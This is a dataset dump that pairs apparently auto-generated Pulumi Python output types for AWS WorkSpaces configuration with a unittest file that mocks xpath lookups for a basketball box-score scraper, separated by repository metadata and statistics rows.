@pulumi.getter(name="deviceTypeWeb")
def device_type_web(self) -> Optional[str]:
"""
Indicates whether users can access their WorkSpaces through a web browser.
"""
return pulumi.get(self, "device_type_web")
@property
@pulumi.getter(name="deviceTypeWindows")
def device_type_windows(self) -> Optional[str]:
"""
Indicates whether users can use Windows clients to access their WorkSpaces.
"""
return pulumi.get(self, "device_type_windows")
@property
@pulumi.getter(name="deviceTypeZeroclient")
def device_type_zeroclient(self) -> Optional[str]:
"""
Indicates whether users can use zero client devices to access their WorkSpaces.
"""
return pulumi.get(self, "device_type_zeroclient")
@pulumi.output_type
class DirectoryWorkspaceCreationProperties(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "customSecurityGroupId":
suggest = "custom_security_group_id"
elif key == "defaultOu":
suggest = "default_ou"
elif key == "enableInternetAccess":
suggest = "enable_internet_access"
elif key == "enableMaintenanceMode":
suggest = "enable_maintenance_mode"
elif key == "userEnabledAsLocalAdministrator":
suggest = "user_enabled_as_local_administrator"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in DirectoryWorkspaceCreationProperties. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
DirectoryWorkspaceCreationProperties.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
DirectoryWorkspaceCreationProperties.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
custom_security_group_id: Optional[str] = None,
default_ou: Optional[str] = None,
enable_internet_access: Optional[bool] = None,
enable_maintenance_mode: Optional[bool] = None,
user_enabled_as_local_administrator: Optional[bool] = None):
"""
:param str custom_security_group_id: The identifier of your custom security group. Should relate to the same VPC, where workspaces reside in.
:param str default_ou: The default organizational unit (OU) for your WorkSpace directories. Should conform `"OU=<value>,DC=<value>,...,DC=<value>"` pattern.
:param bool enable_internet_access: Indicates whether internet access is enabled for your WorkSpaces.
:param bool enable_maintenance_mode: Indicates whether maintenance mode is enabled for your WorkSpaces. For more information, see [WorkSpace Maintenance](https://docs.aws.amazon.com/workspaces/latest/adminguide/workspace-maintenance.html)..
:param bool user_enabled_as_local_administrator: Indicates whether users are local administrators of their WorkSpaces.
"""
if custom_security_group_id is not None:
pulumi.set(__self__, "custom_security_group_id", custom_security_group_id)
if default_ou is not None:
pulumi.set(__self__, "default_ou", default_ou)
if enable_internet_access is not None:
pulumi.set(__self__, "enable_internet_access", enable_internet_access)
if enable_maintenance_mode is not None:
pulumi.set(__self__, "enable_maintenance_mode", enable_maintenance_mode)
if user_enabled_as_local_administrator is not None:
pulumi.set(__self__, "user_enabled_as_local_administrator", user_enabled_as_local_administrator)
@property
@pulumi.getter(name="customSecurityGroupId")
def custom_security_group_id(self) -> Optional[str]:
"""
The identifier of your custom security group. Should relate to the same VPC, where workspaces reside in.
"""
return pulumi.get(self, "custom_security_group_id")
@property
@pulumi.getter(name="defaultOu")
def default_ou(self) -> Optional[str]:
"""
The default organizational unit (OU) for your WorkSpace directories. Should conform `"OU=<value>,DC=<value>,...,DC=<value>"` pattern.
"""
return pulumi.get(self, "default_ou")
@property
@pulumi.getter(name="enableInternetAccess")
def enable_internet_access(self) -> Optional[bool]:
"""
Indicates whether internet access is enabled for your WorkSpaces.
"""
return pulumi.get(self, "enable_internet_access")
@property
@pulumi.getter(name="enableMaintenanceMode")
def enable_maintenance_mode(self) -> Optional[bool]:
"""
Indicates whether maintenance mode is enabled for your WorkSpaces. For more information, see [WorkSpace Maintenance](https://docs.aws.amazon.com/workspaces/latest/adminguide/workspace-maintenance.html)..
"""
return pulumi.get(self, "enable_maintenance_mode")
@property
@pulumi.getter(name="userEnabledAsLocalAdministrator")
def user_enabled_as_local_administrator(self) -> Optional[bool]:
"""
Indicates whether users are local administrators of their WorkSpaces.
"""
return pulumi.get(self, "user_enabled_as_local_administrator")
@pulumi.output_type
class IpGroupRule(dict):
def __init__(__self__, *,
source: str,
description: Optional[str] = None):
"""
:param str source: The IP address range, in CIDR notation, e.g. `10.0.0.0/16`
:param str description: The description.
"""
pulumi.set(__self__, "source", source)
if description is not None:
pulumi.set(__self__, "description", description)
@property
@pulumi.getter
def source(self) -> str:
"""
The IP address range, in CIDR notation, e.g. `10.0.0.0/16`
"""
return pulumi.get(self, "source")
@property
@pulumi.getter
def description(self) -> Optional[str]:
"""
The description.
"""
return pulumi.get(self, "description")
@pulumi.output_type
class WorkspaceWorkspaceProperties(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "computeTypeName":
suggest = "compute_type_name"
elif key == "rootVolumeSizeGib":
suggest = "root_volume_size_gib"
elif key == "runningMode":
suggest = "running_mode"
elif key == "runningModeAutoStopTimeoutInMinutes":
suggest = "running_mode_auto_stop_timeout_in_minutes"
elif key == "userVolumeSizeGib":
suggest = "user_volume_size_gib"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in WorkspaceWorkspaceProperties. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
WorkspaceWorkspaceProperties.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
WorkspaceWorkspaceProperties.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
compute_type_name: Optional[str] = None,
root_volume_size_gib: Optional[int] = None,
running_mode: Optional[str] = None,
running_mode_auto_stop_timeout_in_minutes: Optional[int] = None,
user_volume_size_gib: Optional[int] = None):
"""
:param str compute_type_name: The compute type. For more information, see [Amazon WorkSpaces Bundles](http://aws.amazon.com/workspaces/details/#Amazon_WorkSpaces_Bundles). Valid values are `VALUE`, `STANDARD`, `PERFORMANCE`, `POWER`, `GRAPHICS`, `POWERPRO` and `GRAPHICSPRO`.
:param int root_volume_size_gib: The size of the root volume.
:param str running_mode: The running mode. For more information, see [Manage the WorkSpace Running Mode](https://docs.aws.amazon.com/workspaces/latest/adminguide/running-mode.html). Valid values are `AUTO_STOP` and `ALWAYS_ON`.
:param int running_mode_auto_stop_timeout_in_minutes: The time after a user logs off when WorkSpaces are automatically stopped. Configured in 60-minute intervals.
:param int user_volume_size_gib: The size of the user storage.
"""
if compute_type_name is not None:
pulumi.set(__self__, "compute_type_name", compute_type_name)
if root_volume_size_gib is not None:
pulumi.set(__self__, "root_volume_size_gib", root_volume_size_gib)
if running_mode is not None:
pulumi.set(__self__, "running_mode", running_mode)
if running_mode_auto_stop_timeout_in_minutes is not None:
pulumi.set(__self__, "running_mode_auto_stop_timeout_in_minutes", running_mode_auto_stop_timeout_in_minutes)
if user_volume_size_gib is not None:
pulumi.set(__self__, "user_volume_size_gib", user_volume_size_gib)
@property
@pulumi.getter(name="computeTypeName")
def compute_type_name(self) -> Optional[str]:
"""
The compute type. For more information, see [Amazon WorkSpaces Bundles](http://aws.amazon.com/workspaces/details/#Amazon_WorkSpaces_Bundles). Valid values are `VALUE`, `STANDARD`, `PERFORMANCE`, `POWER`, `GRAPHICS`, `POWERPRO` and `GRAPHICSPRO`.
"""
return pulumi.get(self, "compute_type_name")
@property
@pulumi.getter(name="rootVolumeSizeGib")
def root_volume_size_gib(self) -> Optional[int]:
"""
The size of the root volume.
"""
return pulumi.get(self, "root_volume_size_gib")
@property
@pulumi.getter(name="runningMode")
def running_mode(self) -> Optional[str]:
"""
The running mode. For more information, see [Manage the WorkSpace Running Mode](https://docs.aws.amazon.com/workspaces/latest/adminguide/running-mode.html). Valid values are `AUTO_STOP` and `ALWAYS_ON`.
"""
return pulumi.get(self, "running_mode")
@property
@pulumi.getter(name="runningModeAutoStopTimeoutInMinutes")
def running_mode_auto_stop_timeout_in_minutes(self) -> Optional[int]:
"""
The time after a user logs off when WorkSpaces are automatically stopped. Configured in 60-minute intervals.
"""
return pulumi.get(self, "running_mode_auto_stop_timeout_in_minutes")
@property
@pulumi.getter(name="userVolumeSizeGib")
def user_volume_size_gib(self) -> Optional[int]:
"""
The size of the user storage.
"""
return pulumi.get(self, "user_volume_size_gib")
@pulumi.output_type
class GetBundleComputeTypeResult(dict):
def __init__(__self__, *,
name: str):
"""
:param str name: The name of the bundle. You cannot combine this parameter with `bundle_id`.
"""
pulumi.set(__self__, "name", name)
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the bundle. You cannot combine this parameter with `bundle_id`.
"""
return pulumi.get(self, "name")
@pulumi.output_type
class GetBundleRootStorageResult(dict):
def __init__(__self__, *,
capacity: str):
"""
:param str capacity: The size of the user storage.
"""
pulumi.set(__self__, "capacity", capacity)
@property
@pulumi.getter
def capacity(self) -> str:
"""
The size of the user storage.
"""
return pulumi.get(self, "capacity")
@pulumi.output_type
class GetBundleUserStorageResult(dict):
def __init__(__self__, *,
capacity: str):
"""
:param str capacity: The size of the user storage.
"""
pulumi.set(__self__, "capacity", capacity)
@property
@pulumi.getter
def capacity(self) -> str:
"""
The size of the user storage.
"""
return pulumi.get(self, "capacity")
@pulumi.output_type
class GetDirectorySelfServicePermissionResult(dict):
def __init__(__self__, *,
change_compute_type: bool,
increase_volume_size: bool,
rebuild_workspace: bool,
restart_workspace: bool,
switch_running_mode: bool):
"""
:param bool change_compute_type: Whether WorkSpaces directory users can change the compute type (bundle) for their workspace.
:param bool increase_volume_size: Whether WorkSpaces directory users can increase the volume size of the drives on their workspace.
:param bool rebuild_workspace: Whether WorkSpaces directory users can rebuild the operating system of a workspace to its original state.
:param bool restart_workspace: Whether WorkSpaces directory users can restart their workspace.
:param bool switch_running_mode: Whether WorkSpaces directory users can switch the running mode of their workspace.
"""
pulumi.set(__self__, "change_compute_type", change_compute_type)
pulumi.set(__self__, "increase_volume_size", increase_volume_size)
pulumi.set(__self__, "rebuild_workspace", rebuild_workspace)
pulumi.set(__self__, "restart_workspace", restart_workspace)
pulumi.set(__self__, "switch_running_mode", switch_running_mode)
@property
@pulumi.getter(name="changeComputeType")
def change_compute_type(self) -> bool:
"""
Whether WorkSpaces directory users can change the compute type (bundle) for their workspace.
"""
return pulumi.get(self, "change_compute_type")
@property
@pulumi.getter(name="increaseVolumeSize")
def increase_volume_size(self) -> bool:
"""
Whether WorkSpaces directory users can increase the volume size of the drives on their workspace.
"""
return pulumi.get(self, "increase_volume_size")
@property
@pulumi.getter(name="rebuildWorkspace")
def rebuild_workspace(self) -> bool:
"""
Whether WorkSpaces directory users can rebuild the operating system of a workspace to its original state.
"""
return pulumi.get(self, "rebuild_workspace")
@property
@pulumi.getter(name="restartWorkspace")
def restart_workspace(self) -> bool:
"""
Whether WorkSpaces directory users can restart their workspace.
"""
return pulumi.get(self, "restart_workspace")
@property
@pulumi.getter(name="switchRunningMode")
def switch_running_mode(self) -> bool:
"""
Whether WorkSpaces directory users can switch the running mode of their workspace.
"""
return pulumi.get(self, "switch_running_mode")
@pulumi.output_type
class GetDirectoryWorkspaceAccessPropertyResult(dict):
def __init__(__self__, *,
device_type_android: str,
device_type_chromeos: str,
device_type_ios: str,
device_type_linux: str,
device_type_osx: str,
device_type_web: str,
device_type_windows: str,
device_type_zeroclient: str):
"""
:param str device_type_android: (Optional) Indicates whether users can use Android devices to access their WorkSpaces.
:param str device_type_chromeos: (Optional) Indicates whether users can use Chromebooks to access their WorkSpaces.
:param str device_type_ios: (Optional) Indicates whether users can use iOS devices to access their WorkSpaces.
:param str device_type_linux: (Optional) Indicates whether users can use Linux clients to access their WorkSpaces.
:param str device_type_osx: (Optional) Indicates whether users can use macOS clients to access their WorkSpaces.
:param str device_type_web: (Optional) Indicates whether users can access their WorkSpaces through a web browser.
:param str device_type_windows: (Optional) Indicates whether users can use Windows clients to access their WorkSpaces.
:param str device_type_zeroclient: (Optional) Indicates whether users can use zero client devices to access their WorkSpaces.
"""
pulumi.set(__self__, "device_type_android", device_type_android)
pulumi.set(__self__, "device_type_chromeos", device_type_chromeos)
pulumi.set(__self__, "device_type_ios", device_type_ios)
pulumi.set(__self__, "device_type_linux", device_type_linux)
pulumi.set(__self__, "device_type_osx", device_type_osx)
pulumi.set(__self__, "device_type_web", device_type_web)
pulumi.set(__self__, "device_type_windows", device_type_windows)
pulumi.set(__self__, "device_type_zeroclient", device_type_zeroclient)
@property
@pulumi.getter(name="deviceTypeAndroid")
def device_type_android(self) -> str:
"""
(Optional) Indicates whether users can use Android devices to access their WorkSpaces.
"""
return pulumi.get(self, "device_type_android")
@property
@pulumi.getter(name="deviceTypeChromeos")
def device_type_chromeos(self) -> str:
"""
(Optional) Indicates whether users can use Chromebooks to access their WorkSpaces.
"""
return pulumi.get(self, "device_type_chromeos")
@property
@pulumi.getter(name="deviceTypeIos")
def device_type_ios(self) -> str:
"""
(Optional) Indicates whether users can use iOS devices to access their WorkSpaces.
"""
return pulumi.get(self, "device_type_ios")
@property
@pulumi.getter(name="deviceTypeLinux")
def device_type_linux(self) -> str:
"""
(Optional) Indicates whether users can use Linux clients to access their WorkSpaces.
"""
return pulumi.get(self, "device_type_linux")
@property
@pulumi.getter(name="deviceTypeOsx")
def device_type_osx(self) -> str:
"""
(Optional) Indicates whether users can use macOS clients to access their WorkSpaces.
"""
return pulumi.get(self, "device_type_osx")
@property
@pulumi.getter(name="deviceTypeWeb")
def device_type_web(self) -> str:
"""
(Optional) Indicates whether users can access their WorkSpaces through a web browser.
"""
return pulumi.get(self, "device_type_web")
@property
@pulumi.getter(name="deviceTypeWindows")
def device_type_windows(self) -> str:
"""
(Optional) Indicates whether users can use Windows clients to access their WorkSpaces.
"""
return pulumi.get(self, "device_type_windows")
@property
@pulumi.getter(name="deviceTypeZeroclient")
def device_type_zeroclient(self) -> str:
"""
(Optional) Indicates whether users can use zero client devices to access their WorkSpaces.
"""
return pulumi.get(self, "device_type_zeroclient")
@pulumi.output_type
class GetDirectoryWorkspaceCreationPropertyResult(dict):
def __init__(__self__, *,
custom_security_group_id: str,
default_ou: str,
enable_internet_access: bool,
enable_maintenance_mode: bool,
user_enabled_as_local_administrator: bool):
"""
:param str custom_security_group_id: The identifier of your custom security group. Should relate to the same VPC, where workspaces reside in.
:param str default_ou: The default organizational unit (OU) for your WorkSpace directories.
:param bool enable_internet_access: Indicates whether internet access is enabled for your WorkSpaces.
:param bool enable_maintenance_mode: Indicates whether maintenance mode is enabled for your WorkSpaces. For more information, see [WorkSpace Maintenance](https://docs.aws.amazon.com/workspaces/latest/adminguide/workspace-maintenance.html).
:param bool user_enabled_as_local_administrator: Indicates whether users are local administrators of their WorkSpaces.
"""
pulumi.set(__self__, "custom_security_group_id", custom_security_group_id)
pulumi.set(__self__, "default_ou", default_ou)
pulumi.set(__self__, "enable_internet_access", enable_internet_access)
pulumi.set(__self__, "enable_maintenance_mode", enable_maintenance_mode)
pulumi.set(__self__, "user_enabled_as_local_administrator", user_enabled_as_local_administrator)
@property
@pulumi.getter(name="customSecurityGroupId")
def custom_security_group_id(self) -> str:
"""
The identifier of your custom security group. Should relate to the same VPC, where workspaces reside in.
"""
return pulumi.get(self, "custom_security_group_id")
@property
@pulumi.getter(name="defaultOu")
def default_ou(self) -> str:
"""
The default organizational unit (OU) for your WorkSpace directories.
"""
return pulumi.get(self, "default_ou")
@property
@pulumi.getter(name="enableInternetAccess")
def enable_internet_access(self) -> bool:
"""
Indicates whether internet access is enabled for your WorkSpaces.
"""
return pulumi.get(self, "enable_internet_access")
@property
@pulumi.getter(name="enableMaintenanceMode")
def enable_maintenance_mode(self) -> bool:
"""
Indicates whether maintenance mode is enabled for your WorkSpaces. For more information, see [WorkSpace Maintenance](https://docs.aws.amazon.com/workspaces/latest/adminguide/workspace-maintenance.html).
"""
return pulumi.get(self, "enable_maintenance_mode")
@property
@pulumi.getter(name="userEnabledAsLocalAdministrator")
def user_enabled_as_local_administrator(self) -> bool:
"""
Indicates whether users are local administrators of their WorkSpaces.
"""
return pulumi.get(self, "user_enabled_as_local_administrator")
@pulumi.output_type
class GetWorkspaceWorkspacePropertyResult(dict):
def __init__(__self__, *,
compute_type_name: str,
root_volume_size_gib: int,
running_mode: str,
running_mode_auto_stop_timeout_in_minutes: int,
user_volume_size_gib: int):
"""
:param str compute_type_name: The compute type. For more information, see [Amazon WorkSpaces Bundles](http://aws.amazon.com/workspaces/details/#Amazon_WorkSpaces_Bundles). Valid values are `VALUE`, `STANDARD`, `PERFORMANCE`, `POWER`, `GRAPHICS`, `POWERPRO` and `GRAPHICSPRO`.
:param int root_volume_size_gib: The size of the root volume.
:param str running_mode: The running mode. For more information, see [Manage the WorkSpace Running Mode](https://docs.aws.amazon.com/workspaces/latest/adminguide/running-mode.html). Valid values are `AUTO_STOP` and `ALWAYS_ON`.
:param int running_mode_auto_stop_timeout_in_minutes: The time after a user logs off when WorkSpaces are automatically stopped. Configured in 60-minute intervals.
:param int user_volume_size_gib: The size of the user storage.
"""
pulumi.set(__self__, "compute_type_name", compute_type_name)
pulumi.set(__self__, "root_volume_size_gib", root_volume_size_gib)
pulumi.set(__self__, "running_mode", running_mode)
pulumi.set(__self__, "running_mode_auto_stop_timeout_in_minutes", running_mode_auto_stop_timeout_in_minutes)
pulumi.set(__self__, "user_volume_size_gib", user_volume_size_gib)
@property
@pulumi.getter(name="computeTypeName")
def compute_type_name(self) -> str:
"""
The compute type. For more information, see [Amazon WorkSpaces Bundles](http://aws.amazon.com/workspaces/details/#Amazon_WorkSpaces_Bundles). Valid values are `VALUE`, `STANDARD`, `PERFORMANCE`, `POWER`, `GRAPHICS`, `POWERPRO` and `GRAPHICSPRO`.
"""
return pulumi.get(self, "compute_type_name")
@property
@pulumi.getter(name="rootVolumeSizeGib")
def root_volume_size_gib(self) -> int:
"""
The size of the root volume.
"""
return pulumi.get(self, "root_volume_size_gib")
@property
@pulumi.getter(name="runningMode")
def running_mode(self) -> str:
"""
The running mode. For more information, see [Manage the WorkSpace Running Mode](https://docs.aws.amazon.com/workspaces/latest/adminguide/running-mode.html). Valid values are `AUTO_STOP` and `ALWAYS_ON`.
"""
return pulumi.get(self, "running_mode")
@property
@pulumi.getter(name="runningModeAutoStopTimeoutInMinutes")
def running_mode_auto_stop_timeout_in_minutes(self) -> int:
"""
The time after a user logs off when WorkSpaces are automatically stopped. Configured in 60-minute intervals.
"""
return pulumi.get(self, "running_mode_auto_stop_timeout_in_minutes")
@property
@pulumi.getter(name="userVolumeSizeGib")
def user_volume_size_gib(self) -> int:
"""
The size of the user storage.
"""
return pulumi.get(self, "user_volume_size_gib")
| 44.09613
| 283
| 0.676538
| 4,029
| 35,321
| 5.65376
| 0.061802
| 0.049168
| 0.029106
| 0.042539
| 0.836209
| 0.818649
| 0.805962
| 0.769964
| 0.758242
| 0.704552
| 0
| 0.000849
| 0.233119
| 35,321
| 800
| 284
| 44.15125
| 0.840108
| 0.322811
| 0
| 0.56
| 1
| 0.008421
| 0.200515
| 0.074798
| 0
| 0
| 0
| 0
| 0
| 1
| 0.157895
| false
| 0
| 0.010526
| 0
| 0.317895
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
906338162d06dcdf77969ccd85513a63f4daca42
| 10,571
|
py
|
Python
|
tests/unit/html/test_basic_box_score_row.py
|
tttgm/basketball_reference_web_scraper
|
2dbd9d7bacbcfee17f08bcf8629bd7d50893761d
|
[
"MIT"
] | 325
|
2015-10-27T03:15:49.000Z
|
2022-03-16T06:49:12.000Z
|
tests/unit/html/test_basic_box_score_row.py
|
tttgm/basketball_reference_web_scraper
|
2dbd9d7bacbcfee17f08bcf8629bd7d50893761d
|
[
"MIT"
] | 173
|
2018-10-16T04:11:05.000Z
|
2022-03-29T17:52:08.000Z
|
tests/unit/html/test_basic_box_score_row.py
|
tttgm/basketball_reference_web_scraper
|
2dbd9d7bacbcfee17f08bcf8629bd7d50893761d
|
[
"MIT"
] | 97
|
2016-04-09T19:11:28.000Z
|
2022-03-21T09:57:50.000Z
|
from unittest import TestCase
from unittest.mock import MagicMock
from basketball_reference_web_scraper.html import BasicBoxScoreRow
class TestBasicBoxScoreRow(TestCase):
def setUp(self):
self.html = MagicMock()
def test_playing_time_when_cells_exist(self):
cell = MagicMock(text_content=MagicMock(return_value="some playing time"))
self.html.xpath = MagicMock(return_value=[cell])
self.assertEqual(BasicBoxScoreRow(html=self.html).playing_time, "some playing time")
self.html.xpath.assert_called_once_with('td[@data-stat="mp"]')
def test_playing_time_is_empty_string_when_cells_exist(self):
self.html.xpath = MagicMock(return_value=[])
self.assertEqual(BasicBoxScoreRow(html=self.html).playing_time, '')
self.html.xpath.assert_called_once_with('td[@data-stat="mp"]')
def test_minutes_played_when_cells_exist(self):
cell = MagicMock(text_content=MagicMock(return_value="some minutes played"))
self.html.xpath = MagicMock(return_value=[cell])
self.assertEqual(BasicBoxScoreRow(html=self.html).minutes_played, "some minutes played")
self.html.xpath.assert_called_once_with('td[@data-stat="mp"]')
def test_minutes_played_is_empty_string_when_cells_do_not_exist(self):
self.html.xpath = MagicMock(return_value=[])
self.assertEqual(BasicBoxScoreRow(html=self.html).minutes_played, '')
self.html.xpath.assert_called_once_with('td[@data-stat="mp"]')
def test_made_field_goals_when_cells_exist(self):
cell = MagicMock(text_content=MagicMock(return_value="some made field goals"))
self.html.xpath = MagicMock(return_value=[cell])
self.assertEqual(BasicBoxScoreRow(html=self.html).made_field_goals, "some made field goals")
self.html.xpath.assert_called_once_with('td[@data-stat="fg"]')
def test_made_field_goals_is_empty_string_when_cells_exist(self):
self.html.xpath = MagicMock(return_value=[])
self.assertEqual(BasicBoxScoreRow(html=self.html).made_field_goals, '')
self.html.xpath.assert_called_once_with('td[@data-stat="fg"]')
def test_attempted_field_goals_when_cells_exist(self):
cell = MagicMock(text_content=MagicMock(return_value="some attempted field goals"))
self.html.xpath = MagicMock(return_value=[cell])
self.assertEqual(BasicBoxScoreRow(html=self.html).attempted_field_goals, "some attempted field goals")
self.html.xpath.assert_called_once_with('td[@data-stat="fga"]')
def test_attempted_field_goals_is_empty_string_when_cells_exist(self):
self.html.xpath = MagicMock(return_value=[])
self.assertEqual(BasicBoxScoreRow(html=self.html).attempted_field_goals, '')
self.html.xpath.assert_called_once_with('td[@data-stat="fga"]')
def test_made_three_point_field_goals_when_cells_exist(self):
cell = MagicMock(text_content=MagicMock(return_value="some made three point field goals"))
self.html.xpath = MagicMock(return_value=[cell])
self.assertEqual(
BasicBoxScoreRow(html=self.html).made_three_point_field_goals,
"some made three point field goals",
)
self.html.xpath.assert_called_once_with('td[@data-stat="fg3"]')
def test_made_three_point_field_goals_is_empty_string_when_cells_exist(self):
self.html.xpath = MagicMock(return_value=[])
self.assertEqual(BasicBoxScoreRow(html=self.html).made_three_point_field_goals, '')
self.html.xpath.assert_called_once_with('td[@data-stat="fg3"]')
def test_attempted_three_point_field_goals_when_cells_exist(self):
cell = MagicMock(text_content=MagicMock(return_value="some attempted three point field goals"))
self.html.xpath = MagicMock(return_value=[cell])
self.assertEqual(
BasicBoxScoreRow(html=self.html).attempted_three_point_field_goals,
"some attempted three point field goals",
)
self.html.xpath.assert_called_once_with('td[@data-stat="fg3a"]')
def test_attempted_three_point_field_goals_is_empty_string_when_cells_exist(self):
self.html.xpath = MagicMock(return_value=[])
self.assertEqual(BasicBoxScoreRow(html=self.html).attempted_three_point_field_goals, '')
self.html.xpath.assert_called_once_with('td[@data-stat="fg3a"]')
def test_made_free_throws_when_cells_exist(self):
cell = MagicMock(text_content=MagicMock(return_value="some made free throws"))
self.html.xpath = MagicMock(return_value=[cell])
self.assertEqual(BasicBoxScoreRow(html=self.html).made_free_throws, "some made free throws")
self.html.xpath.assert_called_once_with('td[@data-stat="ft"]')
def test_made_free_throws_is_empty_string_when_cells_exist(self):
self.html.xpath = MagicMock(return_value=[])
self.assertEqual(BasicBoxScoreRow(html=self.html).made_free_throws, '')
self.html.xpath.assert_called_once_with('td[@data-stat="ft"]')
def test_attempted_free_throws_when_cells_exist(self):
cell = MagicMock(text_content=MagicMock(return_value="some attempted free throws"))
self.html.xpath = MagicMock(return_value=[cell])
self.assertEqual(BasicBoxScoreRow(html=self.html).attempted_free_throws, "some attempted free throws")
self.html.xpath.assert_called_once_with('td[@data-stat="fta"]')
def test_attempted_free_throws_is_empty_string_when_cells_exist(self):
self.html.xpath = MagicMock(return_value=[])
self.assertEqual(BasicBoxScoreRow(html=self.html).attempted_free_throws, '')
self.html.xpath.assert_called_once_with('td[@data-stat="fta"]')
def test_offensive_rebounds_when_cells_exist(self):
cell = MagicMock(text_content=MagicMock(return_value="some offensive rebounds"))
self.html.xpath = MagicMock(return_value=[cell])
self.assertEqual(BasicBoxScoreRow(html=self.html).offensive_rebounds, "some offensive rebounds")
self.html.xpath.assert_called_once_with('td[@data-stat="orb"]')
def test_offensive_rebounds_is_empty_string_when_cells_exist(self):
self.html.xpath = MagicMock(return_value=[])
self.assertEqual(BasicBoxScoreRow(html=self.html).offensive_rebounds, '')
self.html.xpath.assert_called_once_with('td[@data-stat="orb"]')
def test_defensive_rebounds_when_cells_exist(self):
cell = MagicMock(text_content=MagicMock(return_value="some defensive rebounds"))
self.html.xpath = MagicMock(return_value=[cell])
self.assertEqual(BasicBoxScoreRow(html=self.html).defensive_rebounds, "some defensive rebounds")
self.html.xpath.assert_called_once_with('td[@data-stat="drb"]')
def test_defensive_rebounds_is_empty_string_when_cells_exist(self):
self.html.xpath = MagicMock(return_value=[])
self.assertEqual(BasicBoxScoreRow(html=self.html).defensive_rebounds, '')
self.html.xpath.assert_called_once_with('td[@data-stat="drb"]')
def test_assists_when_cells_exist(self):
cell = MagicMock(text_content=MagicMock(return_value="some assists"))
self.html.xpath = MagicMock(return_value=[cell])
self.assertEqual(BasicBoxScoreRow(html=self.html).assists, "some assists")
self.html.xpath.assert_called_once_with('td[@data-stat="ast"]')
def test_assists_is_empty_string_when_cells_exist(self):
self.html.xpath = MagicMock(return_value=[])
self.assertEqual(BasicBoxScoreRow(html=self.html).assists, '')
self.html.xpath.assert_called_once_with('td[@data-stat="ast"]')
def test_steals(self):
cell = MagicMock(text_content=MagicMock(return_value="some steals"))
self.html.xpath = MagicMock(return_value=[cell])
self.assertEqual(BasicBoxScoreRow(html=self.html).steals, "some steals")
self.html.xpath.assert_called_once_with('td[@data-stat="stl"]')
def test_steals_is_empty_string_when_cells_exist(self):
self.html.xpath = MagicMock(return_value=[])
self.assertEqual(BasicBoxScoreRow(html=self.html).steals, '')
self.html.xpath.assert_called_once_with('td[@data-stat="stl"]')
def test_blocks_when_cells_exist(self):
cell = MagicMock(text_content=MagicMock(return_value="some blocks"))
self.html.xpath = MagicMock(return_value=[cell])
self.assertEqual(BasicBoxScoreRow(html=self.html).blocks, "some blocks")
self.html.xpath.assert_called_once_with('td[@data-stat="blk"]')
def test_blocks_is_empty_string_when_cells_exist(self):
self.html.xpath = MagicMock(return_value=[])
self.assertEqual(BasicBoxScoreRow(html=self.html).blocks, '')
self.html.xpath.assert_called_once_with('td[@data-stat="blk"]')
def test_turnovers_when_cells_exist(self):
cell = MagicMock(text_content=MagicMock(return_value="some turnovers"))
self.html.xpath = MagicMock(return_value=[cell])
self.assertEqual(BasicBoxScoreRow(html=self.html).turnovers, "some turnovers")
self.html.xpath.assert_called_once_with('td[@data-stat="tov"]')
def test_turnovers_is_empty_string_when_cells_exist(self):
self.html.xpath = MagicMock(return_value=[])
self.assertEqual(BasicBoxScoreRow(html=self.html).turnovers, '')
self.html.xpath.assert_called_once_with('td[@data-stat="tov"]')
def test_personal_fouls_when_cells_exist(self):
cell = MagicMock(text_content=MagicMock(return_value="some personal fouls"))
self.html.xpath = MagicMock(return_value=[cell])
self.assertEqual(BasicBoxScoreRow(html=self.html).personal_fouls, "some personal fouls")
self.html.xpath.assert_called_once_with('td[@data-stat="pf"]')
def test_personal_fouls_is_empty_string_when_cells_exist(self):
self.html.xpath = MagicMock(return_value=[])
self.assertEqual(BasicBoxScoreRow(html=self.html).personal_fouls, '')
self.html.xpath.assert_called_once_with('td[@data-stat="pf"]')
def test_points(self):
cell = MagicMock(text_content=MagicMock(return_value="some points"))
self.html.xpath = MagicMock(return_value=[cell])
self.assertEqual(BasicBoxScoreRow(html=self.html).points, "some points")
self.html.xpath.assert_called_once_with('td[@data-stat="pts"]')
def test_points_is_empty_string_when_cells_do_not_exist(self):
self.html.xpath = MagicMock(return_value=[])
self.assertEqual(BasicBoxScoreRow(html=self.html).points, '')
self.html.xpath.assert_called_once_with('td[@data-stat="pts"]')
| 55.057292
| 110
| 0.730773
| 1,382
| 10,571
| 5.285094
| 0.05644
| 0.106243
| 0.11391
| 0.096386
| 0.952903
| 0.93839
| 0.928122
| 0.917716
| 0.907996
| 0.887185
| 0
| 0.000443
| 0.145303
| 10,571
| 191
| 111
| 55.34555
| 0.807969
| 0
| 0
| 0.423077
| 0
| 0
| 0.121275
| 0.003973
| 0
| 0
| 0
| 0
| 0.410256
| 1
| 0.211538
| false
| 0
| 0.019231
| 0
| 0.237179
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
90739b0bc0b11e92aca673c5fa2fb0ae3692f080
| 4,336
|
py
|
Python
|
pyne/tests/spatial_solvers/dictionary_populate_test.py
|
AllSafeCyberSecur1ty/Nuclear-Engineering
|
302d6dcc7c0a85a9191098366b076cf9cb5a9f6e
|
[
"MIT"
] | 1
|
2022-03-26T20:01:13.000Z
|
2022-03-26T20:01:13.000Z
|
pyne/tests/spatial_solvers/dictionary_populate_test.py
|
